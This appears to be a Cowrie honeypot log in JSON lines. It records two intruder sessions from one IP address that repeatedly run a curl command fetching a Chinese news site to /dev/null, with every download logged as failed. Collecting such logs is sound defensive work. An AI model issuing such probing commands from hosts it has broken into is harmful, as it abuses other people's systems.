{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.550654Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.552547Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.569546Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.570781Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.573388Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.574402Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.592866Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.594231Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.616648Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.617817Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.621681Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.622775Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.630740Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.635486Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.669900Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.671727Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.706926Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.708322Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.765231Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.766325Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.789490Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.790702Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.793156Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.794097Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.838168Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.839323Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.844016Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.844883Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.881634Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.882909Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.887488Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.889374Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.891591Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.892799Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.924876Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.926168Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.936665Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.937807Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.939316Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.941053Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.974545Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.975900Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.979141Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.980677Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:41.991214Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:41.992369Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.017483Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.018844Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.055926Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:42.057541Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.058718Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.062002Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:42.065884Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.067938Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.102888Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:42.117984Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.119049Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:42.125231Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.126454Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.129148Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.159895Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:42.166148Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.167259Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:42.175040Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.176193Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.268766Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:42.290331Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.291744Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.311247Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.348848Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:42.362401Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.363759Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.386766Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:42.409656Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.410881Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.427470Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.446352Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:42.450083Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.451161Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.468266Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.470506Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:42.489712Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.490915Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.513134Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.514269Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.552876Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.555183Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:42.567948Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.569117Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.593454Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.595139Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:42.618504Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.619312Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:42.622173Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.623761Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:42.663332Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.664527Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:42.667338Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.668615Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:42.724046Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.725449Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:42.728162Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.729242Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.768750Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.770382Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:42.799662Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.800483Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:42.803699Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.804961Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.815247Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.902714Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.927434Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.957251Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:42.995945Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:42.997144Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.000549Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.001467Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.008095Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.026291Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.038591Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.039683Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:43.041923Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.042716Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.057434Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.074571Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.131612Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:43.133125Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
